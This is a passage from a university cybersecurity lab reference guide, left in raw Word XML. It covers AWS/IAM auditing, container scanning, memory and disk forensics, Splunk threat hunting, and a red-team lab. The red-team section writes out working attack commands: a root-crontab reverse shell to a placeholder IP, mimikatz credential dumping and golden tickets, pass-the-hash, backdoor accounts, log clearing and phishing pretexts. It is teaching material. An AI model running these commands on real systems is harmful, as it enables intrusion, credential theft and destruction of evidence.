downloaded content.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✔ WHAT TO WRITE IN YOUR OBSERVATION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Create a table: Bucket Name | Public Access? (Yes/No) | Files Count | Sensitive Files Found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aws s3 ls output showing bucket list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Attempted public access and whether it succeeded or returned AccessDenied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If sensitive files found: list their names and type (credentials, config, PII, etc.) — do NOT include actual contents in report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Record the ACL for each bucket — note any AllUsers grants as Critical findings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HOW TO CHECK CORRECT OUTPUT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CREDENTIALS WORKING: 'aws sts get-caller-identity' returns your account number without error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MISCONFIGURATION FOUND: --no-sign-request returns file list (not AccessDenied)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CORRECT BUCKET: ACL shows only owner with FULL_CONTROL — this is properly secured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WRONG: 'NoCredentialProviders' — run aws configure again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WRONG: 'InvalidBucketName' — bucket names are globally unique, check the exact name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hd w:fill="2E75B6" w:val="clear"/>
        <w:spacing w:before="300" w:after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Task 4.2 — IAM Policy Misconfiguration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680"/>
        <w:gridCol w:w="1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Flag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aws iam list-users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Lists all IAM users in the account — gives you a map of all identities to investigate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JSON array of users with UserName, UserId, CreateDate, ARN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Note all usernames. Check CreateDate — any very old accounts with no recent login are security risks.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aws iam list-user-policies --user-name [USER]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Lists inline policies directly attached to a specific user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PolicyNames array in JSON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If user has a policy named 'AdministratorAccess' or 'FullAccess' — investigate it further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aws iam get-user-policy --user-name [USER] --policy-name [POLICY]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Shows the actual JSON policy document — reveals EXACTLY what the user can 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JSON policy with Effect, Action, Resource fields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Look for Action: '*' and Resource: '*' — this means full admin access to everything. This is overly permissive.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aws sts assume-role --role-arn arn:aws:iam::ACCOUNT:role/ROLE --role-session-name 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Attempts to assume (use) a higher-privileged role — tests for privilege escalation paths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Credentials JSON with AccessKeyId, SecretAccessKey, SessionToken (if allowed)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If you receive temporary credentials — you have escalated to that role's privilege level. Test what you can now do.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✔ WHAT TO WRITE IN YOUR OBSERVATION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Record each user found and their attached policies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Note any policies with Action: '*' (wildcard) — this is the most critical misconfiguration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Policy JSON showing overly broad permissions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Successful role assumption if privilege escalation works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Create a privilege escalation path diagram: User A -&gt; assume Role B -&gt; get admin access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HOW TO CHECK CORRECT OUTPUT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OVERLY PERMISSIVE: Policy shows Action: '*' Resource: '*' — this grants every possible AWS permission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PRIVILEGE ESCALATION: assume-role succeeds and new credentials have higher permissions than original user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CORRECT CONFIG: Policies list specific services like Action: 's3:GetObject' on specific resources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WRONG: 'AccessDenied' on assume-role — role does not trust your user. Check the trust policy.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hd w:fill="2E75B6" w:val="clear"/>
        <w:spacing w:before="300" w:after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Task 4.3 — Container Security (Docker &amp; Kubernetes)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680"/>
        <w:gridCol w:w="1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Flag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docker inspect [IMAGE-ID]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Shows full configuration of a Docker image including environment variables, exposed ports, volumes, and entrypoint commands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Large JSON output with Config, NetworkSettings, HostConfig sections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Look for ENV variables in Config section — hardcoded passwords like MYSQL_ROOT_PASSWORD=secret are critical findings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trivy image [IMAGE-NAME]:[TAG]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Scans container image for known CVEs in installed packages. Trivy checks against NVD and OS vendor databases.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Table of vulnerabilities: CVE ID, Severity, Package, Version, Fixed Version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Count CRITICAL and HIGH findings. Any CRITICAL CVE that is fixable (has a Fixed Version) is a priority remediation.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kubectl get pods -o wide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Lists all running pods in the Kubernetes cluster with their IPs, nodes, and status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Table: NAME, READY, STATUS, RESTARTS, AGE, IP, NODE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Look for STATUS=Running (good) vs STATUS=CrashLoopBackOff (error). Note any pods with many RESTARTS — indicates instability.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kubectl get pods -o json | grep -i privileged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Searches all pod configurations for privileged=true setting — privileged containers have root access to the host system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Output shows privileged: true if found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ANY result here is a critical finding. Privileged containers can escape to the host and compromise the entire cluster.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✔ WHAT TO WRITE IN YOUR OBSERVATION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List Docker images found with their tags and vulnerability counts by severity (CRITICAL, HIGH, MEDIUM, LOW)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Record any hardcoded secrets found in docker inspect ENV output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trivy image output showing vulnerability table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kubectl get pods output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If privileged pods found: record their names and which namespace they are in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Note: A privileged container escape allows the attacker to access ALL containers on that host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HOW TO CHECK CORRECT OUTPUT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Trivy WORKING: Output shows summary table even if 0 vulnerabilities (Total: 0 meaning clean image)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kubectl WORKING: You see pod names and STATUS:Running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CRITICAL FINDING: grep returns 'privileged: true' — screenshot this immediately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WRONG: 'permission denied' on docker commands — use sudo or add user to docker group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WRONG: kubectl 'connection refused' — check that cluster is running with 'minikube status' or 'kubectl cluster-info'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hd w:fill="2E75B6" w:val="clear"/>
        <w:spacing w:before="300" w:after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Task 4.4 — Cloud Forensics and Log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680"/>
        <w:gridCol w:w="1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Flag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aws cloudtrail lookup-events --lookup-attributes AttributeKey=ResourceName,AttributeValue=bucket-name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Queries CloudTrail for all API calls involving a specific resource — shows who accessed it, from where, and when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JSON list of events with EventTime, Username, SourceIPAddress, EventName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Look for DeleteObject, PutBucketPolicy events especially from unusual IP addresses or outside business hours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aws ec2 describe-flow-logs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Lists VPC Flow Logs configurations — shows whether network traffic is being logged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Flow log configurations with LogGroupName, TrafficType, DeliverLogsStatus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If DeliverLogsStatus = SUCCESS, logs are active. If no flow logs exist — this is a security gap. Note it.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aws logs describe-log-groups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Lists all CloudWatch log groups — shows what services are sending logs for monitoring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Array of logGroups with logGroupName, retentionInDays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 retentionInDays — logs with null or very low retention can be deleted, impeding future investigations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✔ WHAT TO WRITE IN YOUR OBSERVATION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Record the timeline of events from CloudTrail: Time | Who (Username/Role) | What (EventName) | From where (SourceIP)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Note any suspicious patterns: failed logins, unusual hours, unknown source IPs, mass downloads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CloudTrail events showing at least one suspicious API call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VPC Flow Logs configuration status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In analysis: CloudTrail is the single most important forensic source in AWS — without it investigations are impossible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3864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LAB 5 — Cyber Forensics and Incident Response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CO5: Apply cyber forensic techniques for memory/disk analysis, log investigation, and incident response.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="100" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:shd w:fill="2E75B6" w:val="clear"/>
        <w:spacing w:before="300" w:after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Task 5.1 — Memory Forensics with Volatility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680"/>
        <w:gridCol w:w="1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Flag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winpmem.exe memory.dump (Windows) OR dd if=/dev/mem of=memory.dump (Linux)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Captures a full memory dump of the running system. winpmem is for Windows, dd reads raw memory device on Linux. This preserves volatile evidence.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memory.dump file created with size matching installed RAM (e.g. 2GB file for 2GB RAM)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File size should be close to total RAM. If much smaller — capture may be partial. MD5 hash the file immediately for chain of custody.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volatility -f memory.dump imageinfo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Identifies the exact OS version and correct Volatility profile to use for analysis. You MUST do this before any other Volatility command.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Suggested profiles: Win10x64_19041, Win7SP1x64 etc.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 the FIRST suggested profile for all subsequent commands. If it fails, try the second suggestion.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volatility -f memory.dump --profile=Win10x64_19041 pslist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Lists all running processes at the time of memory capture with PID, parent PID, and start time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Table: Offset, Name, PID, PPID, Threads, Handles, Start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 processes: explorer.exe, svchost.exe, lsass.exe. Suspicious: powershell.exe started recently, unknown process names.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volatility ... malfind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Scans memory for injected code — finds processes with executable memory regions that are NOT backed by files on disk (classic malware indicator)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 of processes with injected regions showing hex dump of suspicious code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ANY result from malfind is suspicious. Note the process name, PID, and memory address. The MZ header (4D5A) indicates an executable.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volatility ... netscan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Shows all network connections in memory at time of capture — reveals malware C2 connections that may have since closed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Table: Offset, Proto, LocalAddr, ForeignAddr, State, PID, Owner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Look for ESTABLISHED connections to unusual IPs, especially from svchost.exe or non-network processes. Note any foreign IP addresses.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volatility ... memdump -p [PID] -D dump/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Extracts the complete memory contents of a specific process to a file for further analysis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dump/[PID].dmp file created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File size corresponds to process memory usage. Analyse with strings command: strings dump/[PID].dmp | grep -i http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✔ WHAT TO WRITE IN YOUR OBSERVATION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Fill Table 5 — Process Analysis: Process Name | PID | PPID | Status | Risk Level | Reason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Example SUSPICIOUS entry: rundll32.exe | 3456 | 1420 | Suspicious | High | No command line args, unusual parent process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pslist output showing all processes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malfind output showing any injected code (MZ headers in memory)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netscan output showing network connections with foreign IPs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Note: If a process shows injected code AND has a network connection — it is almost certainly malware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HOW TO CHECK CORRECT OUTPUT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Volatility WORKING: imageinfo shows suggested profiles without error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pslist SUCCESS: You see a list of 20+ Windows processes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malfind NORMAL RESULT: Some processes always show here (Internet Explorer, Chrome) — focus on unexpected ones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WRONG: 'No suitable address space mapping found' — wrong profile. Try a different one from imageinfo suggestions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WRONG: File not found — ensure the path to memory.dump is correct, use absolute path if needed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hd w:fill="2E75B6" w:val="clear"/>
        <w:spacing w:before="300" w:after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Task 5.2 — Disk Forensics with Autopsy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680"/>
        <w:gridCol w:w="1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Flag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sudo dd if=/dev/sda1 of=disk_image.dd bs=4M conv=noerror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Creates bit-for-bit copy of the disk partition — preserves everything including deleted files and slack space. conv=noerror skips bad sectors.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disk_image.dd file created equal to partition size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MD5 hash BEFORE and AFTER: md5sum disk_image.dd — hashes must match to prove integrity of forensic copy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Autopsy — Create New Case / Import Image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Opens Autopsy GUI for forensic analysis. You create a case, import the disk image, and run ingest modules automatically.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Autopsy analyses image and populates results in left panel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Left panel should show: Data Sources, Views, Results, Reports. Under Views &gt; File Types — you see categorised files.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Autopsy — Deleted Files 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Shows files that have been deleted but not yet overwritten — file system marks sectors as available but data remains until overwritten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 of deleted files with names, paths, dates, and partially recovered content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Deleted files show in red in Autopsy. Select one and check the Hex view — if data is visible, recovery is possible.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Autopsy — Timeline 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Creates a visual timeline of all file creation, modification, and access events — helps identify attacker activity sequence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Interactive timeline showing file events sorted by date and time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Look for clusters of activity at unusual hours. Files created/modified by malware often appear as dense clusters.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✔ WHAT TO WRITE IN YOUR OBSERVATION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Record the MD5 hash of disk_image.dd for chain of custody documentation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List deleted files recovered with their names, original paths, and last modified dates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Autopsy showing deleted files list with file details visible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Timeline showing a suspicious cluster of file activity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In analysis: Describe the 3 timestamps (MAC times): Modified, Accessed, Created — attackers sometimes modify these (timestomping)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HOW TO CHECK CORRECT OUTPUT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DD COPY COMPLETE: dd shows 'x+0 records in / x+0 records out' and md5sum produces a hash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AUTOPSY WORKING: Image appears under Data Sources and file listing populates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DELETED FILES FOUND: Files appear with red X icon in Autopsy file browser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WRONG: 'Permission denied' on dd — run with sudo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WRONG: Autopsy shows empty tree — ingest modules did not run. Right-click data source &gt; Run Ingest Modules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hd w:fill="2E75B6" w:val="clear"/>
        <w:spacing w:before="300" w:after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Task 5.3 — Log Analysis and Threat Hunting with Splunk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680"/>
        <w:gridCol w:w="1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Flag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index=windows eventID=4688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Event ID 4688 = Process Creation in Windows. This shows every process that was started with the command line used.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 of all process creation events with Username, CommandLine, ParentProcess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Suspicious: PowerShell with encoded commands (-enc BASE64STRING), commands run as SYSTEM, unusual parent processes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index=windows eventID=4624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Event ID 4624 = Successful Logon. Tracking these across hosts reveals lateral movement patterns.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Logon events with Account Name, LogonType, Source IP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LogonType 3 = Network logon (remote). Many Type 3 logons from one IP to multiple hosts in short time = lateral movement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index=windows eventID=4672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Event ID 4672 = Special privileges assigned to a new logon — indicates admin/SYSTEM level access was granted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Events showing which user received special privileges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SYSTEM token assignment outside of normal service startup is suspicious — record username and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index=network bytes_out &gt; 1000000000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Searches network logs for any connection sending more than 1GB of data — identifies potential data exfiltration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Source IPs, destination IPs, and byte counts for large transfers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External IPs receiving large transfers during off-hours are the highest priority alert to investigate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✔ WHAT TO WRITE IN YOUR OBSERVATION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Fill Table 6 — Threat Hunting Results: Threat | Log Source | Evidence Found | Confidence | Severity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For lateral movement: count the number of unique hosts accessed by the suspicious user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Splunk search results for EventID 4688 showing suspicious PowerShell commands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Network exfiltration search results showing large transfers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Note the Splunk search syntax used — this becomes part of your incident response runbook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HOW TO CHECK CORRECT OUTPUT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Splunk WORKING: Search bar accepts queries and results populate below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Event 4688 RESULTS: You see CommandLine field in results — this is the key forensic field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EXFILTRATION FOUND: bytes_out &gt; 1GB shows specific source user and external destination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WRONG: 'No results found' for eventID — check your index name matches your data source configuration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WRONG: bytes_out field missing — your network logs may use a different field name like 'bytes' or 'tx_bytes'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hd w:fill="2E75B6" w:val="clear"/>
        <w:spacing w:before="300" w:after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Task 5.4 — Incident Response Simulation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680"/>
        <w:gridCol w:w="1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Flag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net user compromised_user /active:no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Disables the compromised user account immediately — containment step. The account cannot log in but the account object and its audit trail is preserved.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 command completed successfully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Verify: net user compromised_user — output shows 'Account active: No'. Try logging in as that user — should be denied.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dd if=/dev/sda1 of=forensic_image.dd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Creates forensic disk image for evidence preservation BEFORE making any other changes to the system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disk image created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 be done before disabling services or changing configs — otherwise you destroy evidence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taskkill /F /IM explorer.exe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Force-terminates the Explorer process to immediately end the user's active session — stops ongoing data exfiltration in real time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SUCCESS: The process 'explorer.exe' was terminated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User's desktop session ends immediately. Verify by checking Task Manager — explorer.exe should not be running.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✔ WHAT TO WRITE IN YOUR OBSERVATION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Document the INCIDENT TIMELINE: When first detected, when contained, when eradicated, when recovered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Record all containment actions taken with timestamps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Disabled user account (net user showing Account active: No)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Evidence preservation step (dd command running with progress)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Your incident report must cover: Initial detection method | Attack vector | Scope of compromise | Steps taken | Lessons learned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HOW TO CHECK CORRECT OUTPUT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CONTAINMENT VERIFIED: Attempt login as compromised_user — should fail with 'account disabled'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EVIDENCE PRESERVED: forensic_image.dd file exists and MD5 hash is recorded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SCOPE ASSESSED: You can name all systems the attacker accessed, list all data potentially exposed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WRONG order: Never change anything on the live system before taking a forensic image — you contaminate evidence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COMPLETE IR: Your report covers all 6 phases: Preparation, Identification, Containment, Eradication, Recovery, Lessons Learned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3864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LAB 6 — Red Teaming and Advanced Exploitation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CO6: Implement red teaming methodologies including privilege escalation, lateral movement, and social engineering.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="100" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:shd w:fill="2E75B6" w:val="clear"/>
        <w:spacing w:before="300" w:after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Task 6.1 — Privilege Escalation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680"/>
        <w:gridCol w:w="1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Flag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whoami /priv (Windows)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Lists all privileges assigned to the current user token — shows which privileges are Enabled vs Disabled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Table of privileges: SeImpersonatePrivilege, SeDebugPrivilege etc.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If SeImpersonatePrivilege is ENABLED — you can use Juicy Potato or similar to escalate to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sudo -l (Linux)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Lists which commands the current user can run as root with sudo — identifies direct privilege escalation paths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 of allowed commands: (ALL) NOPASSWD: /bin/bash OR specific commands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(ALL) NOPASSWD: /bin/bash means you can get root immediately with: sudo /bin/bash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find / -perm -4000 2&gt;/dev/null (Linux)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Finds all files with SUID bit set — SUID programs run with the file owner's permissions (often root) regardless of who executes them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 of SUID binaries: /usr/bin/passwd, /bin/su, /usr/bin/python (if misconfigured)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Python/vim/find with SUID are exploitable. Check GTFOBins (gtfobins.github.io) for each binary found.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mimikatz 'token::elevate' (Windows)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Uses token impersonation to elevate to SYSTEM by stealing a higher-privileged process token from memory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Token Impersonation: SYSTEM token stolen, shell now runs as NT AUTHORITY\SYSTEM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After elevation: run 'whoami' — it must show NT AUTHORITY\SYSTEM to confirm escalation succeeded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echo '* * * * * bash -i &gt;&amp; /dev/tcp/IP/4444 0&gt;&amp;1' &gt;&gt; /var/spool/cron/crontabs/root (Linux)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Adds a reverse shell command to root's crontab — executes every minute giving persistent root access. Only works if crontab file is world-writable (misconfiguration).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Reverse shell received on nc -lvnp 4444 listener within 60 seconds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Set up nc listener first: nc -lvnp 4444. Within 1 minute you should receive root shell from the cron job.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✔ WHAT TO WRITE IN YOUR OBSERVATION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Document the PRIVILEGE ESCALATION PATH: Start privilege level -&gt; Vulnerability found -&gt; Exploit used -&gt; Final privilege level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Example: User (www-data) -&gt; SUID Python binary found -&gt; GTFOBins exploit -&gt; root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Initial 'whoami' showing low privilege, then FINAL 'whoami' showing root/SYSTEM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The specific vulnerability that allowed escalation (sudo -l output, SUID binary listing, etc.)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Write CVSS score for the technique: SUID misconfiguration = CVSS 7.8 (High)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HOW TO CHECK CORRECT OUTPUT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ESCALATION SUCCESS: 'whoami' or 'getuid' shows root or NT AUTHORITY\SYSTEM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LINUX SUID: python -c 'import os; os.execl("/bin/sh", "sh")' gives root shell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WINDOWS TOKEN: mimikatz 'privilege::debug' must succeed first before token::elevate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WRONG: 'Access denied' on mimikatz — run mimikatz as admin first, then escalate to SYSTEM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WRONG: SUID python not found — look for other SUID binaries: nmap, vim, find, cp, awk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hd w:fill="2E75B6" w:val="clear"/>
        <w:spacing w:before="300" w:after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Task 6.2 — Lateral Movement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680"/>
        <w:gridCol w:w="1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Flag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mimikatz 'sekurlsa::logonpasswords'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Dumps all credentials cached in Windows LSASS memory — extracts NTLM hashes and sometimes plaintext passwords for all logged-in users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 of accounts with NTLM hashes and sometimes plaintext under 'Password :'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You need at minimum the NTLM hash (32 hex character string) for Pass-the-Hash. If plaintext shows — even better.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pth-winexe -U DOMAIN/USER%NTLMHASH //TARGET_IP cmd.exe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Pass-the-Hash: authenticates to remote system using the NTLM hash without knowing the plaintext password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Windows command prompt on TARGET_IP system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Run 'ipconfig' in the shell — it shows TARGET_IP's network config, confirming you are on a different machine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psexec \\TARGET_IP -u DOMAIN\USER -p PASSWORD cmd.exe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Uses SMB to execute commands on a remote Windows system using valid credentials — most common lateral movement tool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Remote command prompt on TARGET_IP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Run 'hostname' in the shell — it shows the TARGET's hostname, not your attacking machine's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mimikatz 'kerberos::golden /user:admin /domain:corp.local /sid:[SID] /krbtgt:[HASH]'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Creates a Golden Ticket — a forged Kerberos ticket valid for any user on the domain, giving permanent domain admin access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Golden ticket created and injected into current session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After golden ticket: access any domain resource with klist — you should see the forged ticket in the Kerberos ticket cache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✔ WHAT TO WRITE IN YOUR OBSERVATION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Document the LATERAL MOVEMENT PATH: Machine 1 (compromised) -&gt; credentials found -&gt; Machine 2 accessed -&gt; etc.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Record how many machines you reached and what data/access was available on each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mimikatz logonpasswords showing NTLM hash of at least one user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Remote command prompt on second machine with 'hostname' and 'whoami' output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Note: Pass-the-Hash works because Windows NTLM authentication accepts the hash directly — the password is never needed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HOW TO CHECK CORRECT OUTPUT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CREDENTIALS DUMPED: You see NTLM hash (32 hex chars) for at least one domain user in mimikatz output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LATERAL MOVEMENT: hostname in remote shell shows DIFFERENT machine name than your starting point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WRONG: mimikatz 'privilege::debug' fails — need admin rights first. Escalate privileges before attempting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WRONG: pth-winexe fails with authentication error — verify NTLM hash format: no colons, 32 chars exactly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hd w:fill="2E75B6" w:val="clear"/>
        <w:spacing w:before="300" w:after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Task 6.3 — Social Engineering Attacks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680"/>
        <w:gridCol w:w="1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Flag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GoPhish Campaign Setup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GoPhish is a phishing simulation platform — create an email template, a fake landing page, and send to a target list to measure click rates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Campaign dashboard shows sent/opened/clicked/submitted metrics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SUCCESS METRIC: Any non-zero click rate shows vulnerability. 15-30% is typical for untrained users.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USB Baiting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Place a USB drive with a harmless autorun script in a visible location — document whether employees plug it in and what percentage execute the payload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Log entries showing USB was plugged in, script executed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If any script executes — physical security is insufficient. Document location, time, and what access was gained.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Pretext Phone Call (IT Support)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Call target claiming to be IT support and request password reset or sensitive info — tests whether employees verify caller identity before complying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Recording or notes of what information was disclosed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If the target provides info without verification — write specific quotes and the information type disclosed (e.g. 'provided email password')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✔ WHAT TO WRITE IN YOUR OBSERVATION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Fill Table 7 — Campaign Results: Campaign Type | Targets | Opened | Clicked | Credentials Captured | Success Rate %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GoPhish dashboard showing campaign statistics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For phone pretext: write a brief script of the call and what information was successfully obtained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Calculate success rates: Clicked/Sent x 100 = click-through rate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In analysis: Higher success rate = lower security awareness. Use these numbers to justify security awareness training budget.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HOW TO CHECK CORRECT OUTPUT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GoPhish WORKING: Dashboard shows sent count incrementing and tracking pixels registering opens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CLICK TRACKED: When you test-click your own phishing link, GoPhish records it in the dashboard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WRONG: Emails not delivered — check SMTP relay settings in GoPhish sending profile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WRONG: Clicks not tracked — ensure the tracking URL in your template uses GoPhish's {{.URL}} variable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hd w:fill="2E75B6" w:val="clear"/>
        <w:spacing w:before="300" w:after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Task 6.4 — Post-Exploitation and Data Exfiltration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680"/>
        <w:gridCol w:w="1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Flag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net user backdoor P@ssw0rd /add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Creates a new local user account as a backdoor — ensures persistent access even if the primary compromise is detected and remediated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 command completed successfully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Verify: net user — backdoor account appears in user list. Try login with those credentials to confirm.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schtasks /create /tn 'System Update' /tr 'powershell -enc [BASE64]' /sc minute /mo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Creates a scheduled task that executes every 5 minutes — provides persistent reverse shell even after reboots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SUCCESS: Scheduled task 'System Update' created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Run 'schtasks /query | findstr Update' — task appears. Wait 5 minutes — reverse shell listener receives new connection.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7z a -pP@ssw0rd data.7z target_files\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Compresses and password-encrypts files for exfiltration — makes data unreadable to DLP tools and reduces transfer size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data.7z archive created with password protection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Verify: 7z l data.7z — file list shows compressed files. Try opening without password — should be denied.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wevtutil cl Application / wevtutil cl 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Clears Windows Event Logs to destroy forensic evidence — removes traces of attacker activity from standard log analysis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Log cleared message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 Event Viewer after — Application and Security logs should be empty. Note: log clearing itself generates a tiny event (ID 1102).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wevtutil cl Security (generates Event 1102)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IMPORTANT: Clearing Security log generates Event ID 1102 — attackers cannot fully erase their tracks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Event 1102 always generated when Security log is cleared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 for Event 1102 in Security log immediately after clearing — it is always created and is itself a forensic indicator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✔ WHAT TO WRITE IN YOUR OBSERVATION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Document ALL persistence mechanisms created: backdoor user, scheduled task, registry key, service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Backdoor user account visible in net user output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Scheduled task created and visible in schtasks /query output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Screenshot required: Compressed encrypted archive ready for exfiltration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IMPORTANT for analysis: Note that Event ID 1102 is created even when logs are cleared — complete anti-forensics is impossible in Windows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HOW TO CHECK CORRECT OUTPUT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PERSISTENCE: Reboot the machine — reverse shell connects back within 5 minutes (scheduled task ran)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EXFILTRATION READY: data.7z exists, is password protected, and contains the target files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TRACKS COVERED: Event Viewer shows empty logs — but Event 1102 appears immediately after clearing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WRONG: Scheduled task does not trigger — check the PowerShell execution policy: Set-ExecutionPolicy Bypass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WRONG: 7z not found — install with: sudo apt install p7zip-full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3864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QUICK REFERENCE — Common Issues and Fixes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="100" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:shd w:fill="2E75B6" w:val="clear"/>
        <w:spacing w:before="300" w:after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Universal Troubleshooting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No ping to target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VM network adapter is set to 'Host-Only' or 'Internal Network' — not NAT. Both VMs must be on the same virtual network.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Command not found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 the tool: sudo apt install [toolname]. For Metasploit: msfdb init &amp;&amp; msfconsole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Permission denied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sudo before the command. For Docker: sudo usermod -aG docker $USER then logout and back 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Exploit completed but no session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 OS may not match exploit (e.g. EternalBlue on Linux). Confirm OS with nmap -O first.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SQLmap finds nothing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DVWA security to 'Low'. Copy your session cookie from browser and add --cookie='PHPSESSID=...' to command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Aircrack key not found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a bigger wordlist: /usr/share/wordlists/rockyou.txt. Use gunzip rockyou.txt.gz first.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Volatility wrong profile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imageinfo first. Try each suggested profile. If nothing works: use --profile=WinXPSP2x86 for old images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kubectl not connecting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Run: minikube start, then kubectl config use-context minikube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Bettercap no traffic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 must browse HTTP sites, not HTTPS. Try browsing http://testphp.vulnweb.com on target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GoPhish emails not sent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a local SMTP relay or MailHog for lab testing — external SMTP providers block phishing tools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hd w:fill="2E75B6" w:val="clear"/>
        <w:spacing w:before="300" w:after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Lab Report Observation Template — What to Write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write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Objective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Restate in your own words what you were trying to accomplish in this task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Procedure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each step. For every command: write the command + what it does + what output you got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Fill the table from the lab book. Write exactly what you observed — tool output, results, timestamps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Analysis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Explain WHAT the results mean and WHY this is a security issue. Link to CVSS score.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Recommendations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3-5 specific, actionable security controls that would prevent this attack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Conclusion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1-2 sentences: what was demonstrated, what was learned, what the security implication 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Screenshots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 every screenshot: 'Figure 1: Task 1.1 — nmap -sV output showing open ports on 192.168.1.20'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— End of Reference Guide — </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="404040"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">CYS-253-MJ-P  |  ASM College, Pune  |  AY 2025-2026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2026-03-24T10:01:28.546Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-03-24T10:01:28.547Z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